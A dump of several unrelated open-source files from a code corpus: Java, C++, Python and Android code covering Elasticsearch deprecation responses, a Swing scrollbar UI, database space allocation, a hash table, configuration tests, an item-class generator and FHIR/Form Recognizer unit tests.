contain deprecation issues indexSettings.put(key, value); } } } } return new DeprecationInfoResponse(clusterSettings, nodeSettings, indexSettings, mlSettings); } @Override public boolean equals(Object o) { if (this == o) return true; if (o == null || getClass() != o.getClass()) return false; DeprecationInfoResponse that = (DeprecationInfoResponse) o; return Objects.equals(clusterSettingsIssues, that.clusterSettingsIssues) && Objects.equals(nodeSettingsIssues, that.nodeSettingsIssues) && Objects.equals(mlSettingsIssues, that.mlSettingsIssues) && Objects.equals(indexSettingsIssues, that.indexSettingsIssues); } @Override public int hashCode() { return Objects.hash(clusterSettingsIssues, nodeSettingsIssues, indexSettingsIssues, mlSettingsIssues); } @Override public String toString() { return clusterSettingsIssues.toString() + ":" + nodeSettingsIssues.toString() + ":" + indexSettingsIssues.toString() + ":" + mlSettingsIssues.toString(); } /** * Information about deprecated items */ public static class DeprecationIssue { private static final ParseField LEVEL = new ParseField("level"); private static final ParseField MESSAGE = new ParseField("message"); private static final ParseField URL = new ParseField("url"); private static final ParseField DETAILS = new ParseField("details"); static final ConstructingObjectParser<DeprecationIssue, Void> PARSER = new ConstructingObjectParser<>("deprecation_issue", true, a -> new DeprecationIssue(Level.fromString((String) a[0]), (String) a[1], (String) a[2], (String) a[3])); static { PARSER.declareString(ConstructingObjectParser.constructorArg(), LEVEL); PARSER.declareString(ConstructingObjectParser.constructorArg(), MESSAGE); PARSER.declareString(ConstructingObjectParser.constructorArg(), URL); PARSER.declareString(ConstructingObjectParser.optionalConstructorArg(), DETAILS); } public enum Level { WARNING, CRITICAL ; public static Level fromString(String value) { return Level.valueOf(value.toUpperCase(Locale.ROOT)); } @Override public String toString() { return name().toLowerCase(Locale.ROOT); } } private Level level; private String message; private String url; private String details; public DeprecationIssue(Level level, String message, String url, @Nullable String details) { this.level = level; this.message = message; this.url = url; this.details = details; } public Level getLevel() { return level; } public String getMessage() { return message; } public String getUrl() { return url; } public String getDetails() { return details; } @Override public boolean equals(Object o) { if (this == o) { return true; } if (o == null || getClass() != o.getClass()) { return false; } DeprecationIssue that = (DeprecationIssue) o; return Objects.equals(level, that.level) && Objects.equals(message, that.message) && Objects.equals(url, that.url) && Objects.equals(details, that.details); } @Override public int hashCode() { return Objects.hash(level, message, url, details); } } }
3,482
634
<filename>platform/platform-impl/src/com/intellij/ui/plaf/beg/BegScrollBarUI.java /* * Copyright 2000-2009 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.ui.plaf.beg; import com.intellij.util.ui.UIUtil; import javax.swing.*; import javax.swing.plaf.ComponentUI; import javax.swing.plaf.basic.BasicScrollBarUI; import java.awt.*; public class BegScrollBarUI extends BasicScrollBarUI { public static ComponentUI createUI(JComponent c) { return new BegScrollBarUI(); } protected void paintThumb(Graphics g, JComponent c, Rectangle thumbBounds) { if (thumbBounds.isEmpty() || !scrollbar.isEnabled()){ return; } int w = thumbBounds.width; int h = thumbBounds.height; g.translate(thumbBounds.x, thumbBounds.y); g.setColor(thumbDarkShadowColor); // g.drawRect(0, 0, w - 1, h - 1); UIUtil.drawLine(g, 0, 1, 0, h - 2); //left UIUtil.drawLine(g, 1, 0, w - 2, 0); //top UIUtil.drawLine(g, w - 1, 1, w - 1, h - 2); //right UIUtil.drawLine(g, 1, h - 1, w - 2, h - 1); //bottom // g.setColor(thumbColor); g.setColor(new Color(247, 243, 239)); g.fillRect(1, 1, w - 2, h - 2); // g.setColor(thumbHighlightColor); // g.setColor(Color.darkGray); // g.drawLine(1, 1, 1, h - 2); // g.drawLine(2, 1, w - 3, 1); // g.setColor(thumbLightShadowColor); // g.drawLine(2, h - 2, w - 2, h - 2); // g.drawLine(w - 2, 1, w - 2, h - 3); g.translate(-thumbBounds.x, -thumbBounds.y); } protected void paintTrack(Graphics g, JComponent c, Rectangle trackBounds) { g.setColor(trackColor); g.fillRect(trackBounds.x, trackBounds.y, trackBounds.width, trackBounds.height); if (trackHighlight == DECREASE_HIGHLIGHT){ paintDecreaseHighlight(g); } else if (trackHighlight == INCREASE_HIGHLIGHT){ paintIncreaseHighlight(g); } } }
954
803
<filename>dev/ese/src/inc/_space.hxx // Copyright (c) Microsoft Corporation. // Licensed under the MIT License. #ifndef _SPACE_H_INCLUDED #define _SPACE_H_INCLUDED /*PERSISTED*/ typedef enum class SpacePool : ULONG { // Explicit Pools - except the 0 / AvailExtLegacyGeneralPool, these are stored/persisted // explicitly in the byte at front of 5-byte avail pool key. MinPool = 0x00, AvailExtLegacyGeneralPool = 0x00, // General / Legacy Free Pool. ContinuousPool = 0x01, // Reserved for contiguous allocations. ShelvedPool = 0x02, // Shelved page (available space beyond EOF, which can't be used). MaxPool, // Virtual Pools - these pools exist by the context in where the extent was found, and only used to // communicate this fact out the space APIs. They are not persisted. PrimaryExt = 0x00010000, // Used to mark an extent that is within the primary extent. OwnedTreeAvail = 0x00020000, // Available pages reserved for use to split (i.e. in spbuf) the Owned Extents Tree. AvailTreeAvail = 0x00030000, // Available pages reserved for use to split (i.e. in spbuf) the Avail Extents Tree. } spp; static_assert( 0 == (ULONG)spp::AvailExtLegacyGeneralPool, "Persisted and so must be immutable" ); static_assert( 1 == (ULONG)spp::ContinuousPool, "Persisted and so must be immutable" ); static_assert( 2 == (ULONG)spp::ShelvedPool, "Persisted and so must be immutable" ); inline BOOL FSPIValidExplicitSpacePool( SpacePool spp ) { return ( ( spp::MinPool <= spp ) && ( spp < spp::MaxPool ) ); }; inline const WCHAR * const WszPoolName( _In_ const SpacePool spp ) { switch( spp ) { case spp::AvailExtLegacyGeneralPool: return L"Gen"; case spp::ContinuousPool: return L"Cont"; case spp::ShelvedPool: return L"Shvd"; case spp::PrimaryExt: return L"Pri"; case spp::OwnedTreeAvail: return L"OeRes"; case spp::AvailTreeAvail: return L"AeRes"; } Assert( fFalse ); if ( spp == spp::MaxPool ) { // A special case of unknown. But you shouldn't be asking for the name of this, it // doesn't really have one. return L"UnknMax"; } return L"Unkn"; } // Incrementors for SpacePool (i.e. ++SpacePool and SpacePool++) INLINE SpacePool& operator++( SpacePool &spp ) { // The value you're incrementing is in the normal range, right? Assert( ( spp::MinPool <= spp ) && ( spp::MaxPool > spp) ); using IntType = typename std::underlying_type<SpacePool>::type; spp = static_cast<SpacePool>( static_cast<IntType>(spp) + 1 ); return spp; } INLINE SpacePool operator++( SpacePool &spp, int ) { SpacePool result = spp; ++spp; return result; } #ifndef SPACE_ONLY_DIAGNOSTIC_CONSTANTS // internal space functions called by recovery // VOID SPIInitPgnoFDP( FUCB *pfucb, CSR *pcsr, const SPACE_HEADER& sph ); VOID SPIPerformCreateMultiple( FUCB *pfucb, CSR *pcsrFDP, CSR *pcsrOE, CSR *pcsrAE, PGNO pgnoLast, CPG cpgPrimary ); VOID SPICreateExtentTree( FUCB *pfucb, CSR *pcsr, PGNO pgnoLast, CPG cpgExtent, BOOL fAvail ); ERR ErrSPICreateSingle( FUCB *pfucb, CSR *pcsr, const PGNO pgnoParent, const PGNO pgnoFDP, const OBJID objidFDP, CPG cpgPrimary, const BOOL fUnique, const ULONG fPageFlags, const DBTIME dbtime ); VOID SPIConvertGetExtentinfo( FUCB *pfucb, CSR *pcsrRoot, SPACE_HEADER *psph, EXTENTINFO *rgext, INT *piextMac ); VOID SPIConvertCalcExtents( const SPACE_HEADER& sph, const PGNO pgnoFDP, EXTENTINFO *rgext, INT *pcext ); VOID SPIPerformConvert( FUCB *pfucb, CSR *pcsrRoot, CSR *pcsrAE, CSR *pcsrOE, SPACE_HEADER *psph, PGNO pgnoSecondaryFirst, CPG cpgSecondary, EXTENTINFO *rgext, INT iextMac ); ERR ErrSPIOpenAvailExt( PIB *ppib, FCB *pfcb, FUCB **ppfucbAE ); ERR ErrSPIOpenOwnExt( PIB *ppib, FCB *pfcb, FUCB **ppfucbOE ); ERR ErrSPIGetExtentInfo( __in const FUCB *pfucb, __out PGNO *ppgnoLast, __out CPG *pcpgSize, __out SpacePool *psppPool ); ERR ErrSPIGetExtentInfo( __in const KEYDATAFLAGS *pkdf, __out PGNO *ppgnoLast, __out CPG *pcpgSize, __out SpacePool *psppPool ); ERR ErrSPITrimUpdateDatabaseHeader( const IFMP ifmp ); ERR ErrSPIREPAIRValidateSpaceNode( __in const KEYDATAFLAGS * pkdf, __out PGNO * ppgnoLast, __out CPG * pcpgExtent, __out SpacePool * sppPool ); const CPG cpgSmallFDP = 16; // count of owned pages below which an FDP const CPG cpgSmallGrow = 4; // minimum count of pages to grow a small FDP const CPG cpgSmallDbSpaceSize = 254; // use small DB alloc policies, while DB is smaller than this const PGNO pgnoSmallDbSpaceStart = 128; // use small DB alloc policies, when allocation starts in this area of DB const CPG cpgSmallSpaceAvailMost = 32; // maximum number of pages allocatable from single extent space format const CPG cpgMultipleExtentConvert = 2; // minimum pages to preallocate when converting to multiple extent // (enough for OE/AE) const CPG cpgMaxRootPageSplit = 2; // max. theoretical pages required to satisfy split on single-level tree const CPG cpgPrefRootPageSplit = 2; // preferred pages to satisfy split on single-level tree const CPG cpgMaxParentOfLeafRootSplit = 3; // max. theoretical pages required to satisfy split on 2-level tree const CPG cpgPrefParentOfLeafRootSplit = 8; // preferred pages to satisfy split on 2-level tree const CPG cpgMaxSpaceTreeSplit = 4; // max. theoretical pages required to satisfy space tree split (because max. depth is 4) const CPG cpgPrefSpaceTreeSplit = 16; // preferred pages to satisfy space tree split #endif // SPACE_ONLY_DIAGNOSTIC_CONSTANTS #endif // _SPACE_H_INCLUDED
3,254
579
<reponame>nilyibo/eRPC #pragma once namespace mica { namespace table { template <class StaticConfig> /** * @param key_hash The hash of the key computed using mica::util::hash * @param key The key to get() * @param out_value Pointer to a buffer to copy the value to. The buffer should * have space for StaticConfig::kValSize bytes */ Result FixedTable<StaticConfig>::get(uint64_t key_hash, const ft_key_t& key, char* out_value) const { uint32_t bucket_index = calc_bucket_index(key_hash); const Bucket* bucket = get_bucket(bucket_index); while (true) { uint32_t version_start = read_version_begin(bucket); const Bucket* located_bucket; size_t item_index = find_item_index(bucket, key, &located_bucket); if (item_index == StaticConfig::kBucketCap) { if (version_start != read_version_end(bucket)) continue; /* Try again */ stat_inc(&Stats::get_notfound); return Result::kNotFound; } uint8_t* _val = get_value(located_bucket, item_index); ::mica::util::memcpy<8>(out_value, _val, val_size); if (version_start != read_version_end(bucket)) continue; /* Try again */ stat_inc(&Stats::get_found); break; } return Result::kSuccess; } } }
480
2,728
<filename>sdk/formrecognizer/azure-ai-formrecognizer/tests/test_receipt.py<gh_stars>1000+ # coding=utf-8 # ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ import pytest import functools from io import BytesIO from datetime import date, time from azure.ai.formrecognizer import FormRecognizerClient, FormContentType, FormRecognizerApiVersion from testcase import FormRecognizerTest from preparers import GlobalClientPreparer as _GlobalClientPreparer from preparers import FormRecognizerPreparer GlobalClientPreparerV2 = functools.partial(_GlobalClientPreparer, FormRecognizerClient) class TestReceiptFromStream(FormRecognizerTest): @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_passing_enum_content_type_v2(self, client): with open(self.receipt_png, "rb") as fd: myfile = fd.read() poller = client.begin_recognize_receipts( myfile, content_type=FormContentType.IMAGE_PNG ) result = poller.result() assert result is not None @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_damaged_file_bytes_fails_autodetect_content_type(self, client): damaged_pdf = b"\x50\x44\x46\x55\x55\x55" # doesn't match any magic file numbers with self.assertRaises(ValueError): poller = client.begin_recognize_receipts( damaged_pdf ) @FormRecognizerPreparer() @GlobalClientPreparerV2() # TODO should there be a v3 version of this test? def test_damaged_file_bytes_io_fails_autodetect(self, client): damaged_pdf = BytesIO(b"\x50\x44\x46\x55\x55\x55") # doesn't match any magic file numbers with self.assertRaises(ValueError): poller = client.begin_recognize_receipts( damaged_pdf ) @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_passing_bad_content_type_param_passed(self, client): with open(self.receipt_jpg, "rb") as fd: myfile = fd.read() with self.assertRaises(ValueError): poller = client.begin_recognize_receipts( myfile, content_type="application/jpeg" ) @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_passing_unsupported_url_content_type(self, client): with self.assertRaises(TypeError): poller = client.begin_recognize_receipts( "https://badurl.jpg", content_type="application/json" ) @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_receipt_jpg_include_field_elements(self, client): with open(self.receipt_jpg, "rb") as fd: receipt = fd.read() poller = client.begin_recognize_receipts(receipt, include_field_elements=True) result = poller.result() assert len(result) == 1 receipt = result[0] self.assertFormPagesHasValues(receipt.pages) for name, field in receipt.fields.items(): if field.value_type not in ["list", "dictionary"] and name != "ReceiptType": # receipt cases where value_data is None self.assertFieldElementsHasValues(field.value_data.field_elements, receipt.page_range.first_page_number) assert receipt.fields.get("MerchantAddress").value, '123 Main Street Redmond == WA 98052' assert receipt.fields.get("MerchantName").value == 'Contoso' assert receipt.fields.get("MerchantPhoneNumber").value == '+19876543210' assert receipt.fields.get("Subtotal").value == 11.7 assert receipt.fields.get("Tax").value == 1.17 assert receipt.fields.get("Tip").value == 1.63 assert receipt.fields.get("Total").value == 14.5 assert receipt.fields.get("TransactionDate").value == date(year=2019, month=6, day=10) assert receipt.fields.get("TransactionTime").value == time(hour=13, minute=59, second=0) assert receipt.page_range.first_page_number == 1 assert receipt.page_range.last_page_number == 1 self.assertFormPagesHasValues(receipt.pages) receipt_type = receipt.fields.get("ReceiptType") assert receipt_type.confidence is not None assert receipt_type.value == 'Itemized' @FormRecognizerPreparer() @GlobalClientPreparerV2(client_kwargs={"api_version": FormRecognizerApiVersion.V2_0}) def test_receipt_locale_v2(self, client): with open(self.receipt_jpg, "rb") as fd: receipt = fd.read() with pytest.raises(ValueError) as e: client.begin_recognize_receipts(receipt, locale="en-US") assert "'locale' is only available for API version V2_1 and up" in str(e.value)
1,994
735
/** * Tencent is pleased to support the open source community by making DCache available. * Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved. * Licensed under the BSD 3-Clause License (the "License"); you may not use this file * except in compliance with the License. You may obtain a copy of the License at * * https://opensource.org/licenses/BSD-3-Clause * * Unless required by applicable law or agreed to in writing, software distributed under * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, * either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ #ifndef __PROXY_WRAPPER_H__ #define __PROXY_WRAPPER_H__ #include "framework/AdminReg.h" #include "servant/Application.h" class AdminRegProxyWrapper { public: typedef std::map<std::string, std::string> TARS_CONTEXT; explicit AdminRegProxyWrapper(const std::string &obj) : _adminProxy(Application::getCommunicator()->stringToProxy<AdminRegPrx>(obj)) { } virtual ~AdminRegProxyWrapper() = default; virtual void tars_timeout(int msecond) { _adminProxy->tars_timeout(msecond); } virtual tars::Int32 getServerState(const std::string &application, const std::string &serverName, const std::string &nodeName, tars::ServerStateDesc &state, std::string &result, const map<string, string> &context = TARS_CONTEXT(), map<string, string> *pResponseContext = NULL) { return _adminProxy->getServerState( application, serverName, nodeName, state, result, context, pResponseContext); } protected: AdminRegProxyWrapper() = default; private: AdminRegPrx _adminProxy; }; class RouterClientWrapper { public: explicit RouterClientWrapper(const std::string &obj) : _routerClientPrx(Application::getCommunicator()->stringToProxy<RouterClientPrx>(obj)) { } virtual ~RouterClientWrapper() = default; virtual void tars_timeout(int msecond) { _routerClientPrx->tars_timeout(msecond); } protected: RouterClientWrapper() = default; private: RouterClientPrx _routerClientPrx; }; #endif // __PROXY_WRAPPER_H__
945
2,151
<filename>Study/google-databinding/src/main/java/android/databinding/test/independentlibrary/LibraryAdapter.java /* * Copyright (C) 2015 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package android.databinding.test.independentlibrary; import android.databinding.BindingAdapter; import android.view.View; public class LibraryAdapter { @BindingAdapter("myTagAttr") public static void set(View view, String someTag) { view.setTag(someTag); } }
286
876
<reponame>mkdir700/feapder # -*- coding: utf-8 -*- """ Created on 2018-08-28 17:38:43 --------- @summary: 创建item --------- @author: Boris @email: <EMAIL> """ import getpass import os import feapder.utils.tools as tools from feapder import setting from feapder.db.mysqldb import MysqlDB from .create_init import CreateInit def deal_file_info(file): file = file.replace("{DATE}", tools.get_current_date()) file = file.replace("{USER}", getpass.getuser()) return file class CreateItem: def __init__(self): self._db = MysqlDB() self._create_init = CreateInit() def select_columns(self, table_name): # sql = 'SHOW COLUMNS FROM ' + table_name sql = f"SELECT COLUMN_NAME, COLUMN_TYPE, IS_NULLABLE, COLUMN_DEFAULT, EXTRA, COLUMN_KEY, COLUMN_COMMENT FROM INFORMATION_SCHEMA.Columns WHERE table_name = '{table_name}' and table_schema = '{setting.MYSQL_DB}'" columns = self._db.find(sql) return columns def select_tables_name(self, tables_name): """ @summary: --------- @param tables_name: 一类tables 如 qidian* --------- @result: """ sql = f"select table_name from information_schema.tables where table_name like '{tables_name}' and table_schema = '{setting.MYSQL_DB}'" tables_name = self._db.find(sql) return tables_name def convert_table_name_to_hump(self, table_name): """ @summary: 格式化表明为驼峰格式 --------- @param table: --------- @result: """ table_hump_format = "" words = table_name.split("_") for word in words: table_hump_format += word.capitalize() # 首字母大写 return table_hump_format def get_item_template(self): template_path = os.path.abspath( os.path.join(__file__, "../../../templates/item_template.tmpl") ) with open(template_path, "r", encoding="utf-8") as file: item_template = file.read() return item_template def create_item(self, item_template, columns, table_name, support_dict): table_name_hump_format = self.convert_table_name_to_hump(table_name) # 组装 类名 item_template = item_template.replace("${item_name}", table_name_hump_format) if support_dict: item_template = item_template.replace("${command}", table_name + " 1") else: item_template = item_template.replace("${command}", table_name) item_template = item_template.replace("${table_name}", table_name) # 组装 属性 propertys = "" for column in columns: column_name = column[0] column_type = column[1] is_nullable = column[2] column_default = column[3] column_extra = column[4] column_key = column[5] column_comment = column[6] try: column_default = None if column_default == "NULL" else column_default value = ( "kwargs.get('{column_name}')".format(column_name=column_name) if support_dict else ( column_default != "CURRENT_TIMESTAMP" and column_default or None ) and eval(column_default) ) except: value = ( "kwargs.get('{column_name}')".format(column_name=column_name) if support_dict else ( column_default != "CURRENT_TIMESTAMP" and column_default or None ) and column_default ) if column_extra == "auto_increment" or column_default is not None: propertys += f"# self.{column_name} = {value}" else: if value is None or isinstance(value, (float, int)) or support_dict: propertys += f"self.{column_name} = {value}" else: propertys += f"self.{column_name} = '{value}'" if column_comment: propertys += f" # {column_comment}" propertys += "\n" + " " * 8 item_template = item_template.replace("${propertys}", propertys.strip()) item_template = deal_file_info(item_template) return item_template def save_template_to_file(self, item_template, table_name): item_file = table_name + "_item.py" if os.path.exists(item_file): confirm = input("%s 文件已存在 是否覆盖 (y/n). " % item_file) if confirm != "y": print("取消覆盖 退出") return with open(item_file, "w", encoding="utf-8") as file: file.write(item_template) print("\n%s 生成成功" % item_file) self._create_init.create() def create(self, tables_name, support_dict): input_tables_name = tables_name tables_name = self.select_tables_name(tables_name) if not tables_name: print(tables_name) tip = "mysql数据库中无 %s 表 " % input_tables_name raise KeyError(tip) for table_name in tables_name: table_name = table_name[0] columns = self.select_columns(table_name) item_template = self.get_item_template() item_template = self.create_item( item_template, columns, table_name, support_dict ) self.save_template_to_file(item_template, table_name)
2,782
14,668
<reponame>zealoussnow/chromium // Copyright 2016 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_CORE_WORKERS_THREADED_OBJECT_PROXY_BASE_H_ #define THIRD_PARTY_BLINK_RENDERER_CORE_WORKERS_THREADED_OBJECT_PROXY_BASE_H_ #include "third_party/blink/renderer/bindings/core/v8/source_location.h" #include "third_party/blink/renderer/core/core_export.h" #include "third_party/blink/renderer/core/messaging/message_port.h" #include "third_party/blink/renderer/core/workers/worker_reporting_proxy.h" #include "third_party/blink/renderer/platform/heap/persistent.h" namespace blink { class ParentExecutionContextTaskRunners; class ThreadedMessagingProxyBase; // The base proxy class to talk to a DedicatedWorker or *Worklet object on the // main thread via the ThreadedMessagingProxyBase from a worker thread. This is // created and destroyed on the main thread, and used on the worker thread. // ThreadedMessagingProxyBase always outlives this proxy. class CORE_EXPORT ThreadedObjectProxyBase : public WorkerReportingProxy { USING_FAST_MALLOC(ThreadedObjectProxyBase); public: ThreadedObjectProxyBase(const ThreadedObjectProxyBase&) = delete; ThreadedObjectProxyBase& operator=(const ThreadedObjectProxyBase&) = delete; ~ThreadedObjectProxyBase() override = default; void ReportPendingActivity(bool has_pending_activity); // WorkerReportingProxy overrides. void CountFeature(WebFeature) override; void ReportConsoleMessage(mojom::ConsoleMessageSource, mojom::ConsoleMessageLevel, const String& message, SourceLocation*) override; void DidCloseWorkerGlobalScope() override; void DidTerminateWorkerThread() override; protected: explicit ThreadedObjectProxyBase(ParentExecutionContextTaskRunners*); virtual CrossThreadWeakPersistent<ThreadedMessagingProxyBase> MessagingProxyWeakPtr() = 0; ParentExecutionContextTaskRunners* GetParentExecutionContextTaskRunners(); private: // Used to post a task to ThreadedMessagingProxyBase on the parent context // thread. CrossThreadPersistent<ParentExecutionContextTaskRunners> parent_execution_context_task_runners_; }; } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_CORE_WORKERS_THREADED_OBJECT_PROXY_BASE_H_
803
1,531
<filename>ngrinder-controller/src/test/java/org/ngrinder/infra/config/ConfigTest.java /* * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.ngrinder.infra.config; import org.junit.Before; import org.junit.Test; import org.ngrinder.common.constant.ClusterConstants; import org.ngrinder.common.constant.ControllerConstants; import org.ngrinder.common.model.Home; import org.ngrinder.common.util.PropertiesWrapper; import org.springframework.test.util.ReflectionTestUtils; import java.io.File; import java.util.Properties; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.*; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; public class ConfigTest implements ControllerConstants, ClusterConstants { private MockConfig config; @Before public void before() { System.setProperty("unit-test", ""); config = new MockConfig(); config.init(); } @Test public void testDefaultHome() { Home home = config.getHome(); File oracle = new File(System.getProperty("user.home"), ".ngrinder"); assertThat(home.getDirectory(), is(oracle)); assertThat(home.getPluginsDirectory(), is(new File(oracle, "plugins"))); } @Test public void testGetMonitorPort() { int port = config.getMonitorPort(); assertThat(port, not(0)); } @Test public void testTestMode() { PropertiesWrapper wrapper = mock(PropertiesWrapper.class); config.setControllerProperties(wrapper); // When dev_mode false and pluginsupport is true, it should be true when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(false); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_PLUGIN_SUPPORT)).thenReturn(false); assertThat(config.isPluginSupported(), is(false)); // When dev_mode true and pluginsupport is false, it should be false when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(true); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_PLUGIN_SUPPORT)).thenReturn(false); assertThat(config.isPluginSupported(), is(false)); // When dev_mode false and pluginsupport is false, it should be false when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(false); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_PLUGIN_SUPPORT)).thenReturn(false); assertThat(config.isPluginSupported(), is(false)); // When dev_mode true and pluginsupport is true, it should be false when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(true); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_PLUGIN_SUPPORT)).thenReturn(true); assertThat(config.isPluginSupported(), is(true)); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(true); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_SECURITY)).thenReturn(true); assertThat(config.isSecurityEnabled(), is(false)); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(false); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_SECURITY)).thenReturn(true); assertThat(config.isSecurityEnabled(), is(true)); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(false); when(wrapper.getPropertyBoolean(PROP_CONTROLLER_SECURITY)).thenReturn(false); assertThat(config.isSecurityEnabled(), is(false)); } @Test public void testPolicyFileLoad() { String processAndThreadPolicyScript = config.getProcessAndThreadPolicyScript(); assertThat(processAndThreadPolicyScript, containsString("function")); } @Test public void testVersionString() { String version = config.getVersion(); assertThat(version, not("UNKNOWN")); } @Test public void testLoadExtendProperties() { config.cluster = true; Properties wrapper = new Properties(); wrapper.put(PROP_CLUSTER_REGION, "TestNewRegion"); config.doRealOnRegion = true; // set mock exHome and test Home mockExHome = mock(Home.class); when(mockExHome.getProperties("system-ex.conf")).thenReturn(wrapper); when(mockExHome.exists()).thenReturn(true); ReflectionTestUtils.setField(config, "exHome", mockExHome); config.loadProperties(); assertThat(config.getRegion(), is("TestNewRegion")); } }
1,531
418
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Generated from FHIR 4.0.0-a53ec6ee1b on 2019-05-07. # 2019, SMART Health IT. import os import io import unittest import json from . import structuredefinition from .fhirdate import FHIRDate class StructureDefinitionTests(unittest.TestCase): def instantiate_from(self, filename): datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or '' with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle: js = json.load(handle) self.assertEqual("StructureDefinition", js["resourceType"]) return structuredefinition.StructureDefinition(js) def testStructureDefinition1(self): inst = self.instantiate_from("structuredefinition-example-section-library.json") self.assertIsNotNone(inst, "Must have instantiated a StructureDefinition instance") self.implStructureDefinition1(inst) js = inst.as_json() self.assertEqual("StructureDefinition", js["resourceType"]) inst2 = structuredefinition.StructureDefinition(js) self.implStructureDefinition1(inst2) def implStructureDefinition1(self, inst): self.assertTrue(inst.abstract) self.assertEqual(inst.baseDefinition, "http://hl7.org/fhir/StructureDefinition/Composition") self.assertEqual(inst.date.date, FHIRDate("2018-11-05T17:57:00+11:00").date) self.assertEqual(inst.date.as_json(), "2018-11-05T17:57:00+11:00") self.assertEqual(inst.derivation, "constraint") self.assertEqual(inst.differential.element[0].id, "Composition") self.assertEqual(inst.differential.element[0].path, "Composition") self.assertEqual(inst.differential.element[1].id, "Composition.section") self.assertEqual(inst.differential.element[1].path, "Composition.section") self.assertEqual(inst.differential.element[1].slicing.description, "Slice by .section.code when using this library of sections") self.assertEqual(inst.differential.element[1].slicing.discriminator[0].path, "code") self.assertEqual(inst.differential.element[1].slicing.discriminator[0].type, "pattern") self.assertTrue(inst.differential.element[1].slicing.ordered) self.assertEqual(inst.differential.element[1].slicing.rules, "closed") self.assertEqual(inst.differential.element[2].id, "Composition.section:procedure") self.assertEqual(inst.differential.element[2].path, "Composition.section") self.assertEqual(inst.differential.element[2].sliceName, "procedure") self.assertEqual(inst.differential.element[3].fixedString, "Procedures Performed") self.assertEqual(inst.differential.element[3].id, "Composition.section:procedure.title") self.assertEqual(inst.differential.element[3].min, 1) self.assertEqual(inst.differential.element[3].path, "Composition.section.title") self.assertEqual(inst.differential.element[4].id, "Composition.section:procedure.code") self.assertEqual(inst.differential.element[4].min, 1) self.assertEqual(inst.differential.element[4].path, "Composition.section.code") self.assertEqual(inst.differential.element[4].patternCodeableConcept.coding[0].code, "29554-3") self.assertEqual(inst.differential.element[4].patternCodeableConcept.coding[0].display, "Procedure Narrative") self.assertEqual(inst.differential.element[4].patternCodeableConcept.coding[0].system, "http://loinc.org") self.assertEqual(inst.differential.element[5].id, "Composition.section:medications") self.assertEqual(inst.differential.element[5].path, "Composition.section") self.assertEqual(inst.differential.element[5].sliceName, "medications") self.assertEqual(inst.differential.element[6].fixedString, "Medications Administered") self.assertEqual(inst.differential.element[6].id, "Composition.section:medications.title") self.assertEqual(inst.differential.element[6].min, 1) self.assertEqual(inst.differential.element[6].path, "Composition.section.title") self.assertEqual(inst.differential.element[7].id, "Composition.section:medications.code") self.assertEqual(inst.differential.element[7].min, 1) self.assertEqual(inst.differential.element[7].path, "Composition.section.code") self.assertEqual(inst.differential.element[7].patternCodeableConcept.coding[0].code, "29549-3") self.assertEqual(inst.differential.element[7].patternCodeableConcept.coding[0].display, "Medication administered Narrative") self.assertEqual(inst.differential.element[7].patternCodeableConcept.coding[0].system, "http://loinc.org") self.assertEqual(inst.differential.element[8].id, "Composition.section:plan") self.assertEqual(inst.differential.element[8].path, "Composition.section") self.assertEqual(inst.differential.element[8].sliceName, "plan") self.assertEqual(inst.differential.element[9].fixedString, "Discharge Treatment Plan") self.assertEqual(inst.differential.element[9].id, "Composition.section:plan.title") self.assertEqual(inst.differential.element[9].min, 1) self.assertEqual(inst.differential.element[9].path, "Composition.section.title") self.assertFalse(inst.experimental) self.assertEqual(inst.id, "example-section-library") self.assertEqual(inst.kind, "complex-type") self.assertEqual(inst.name, 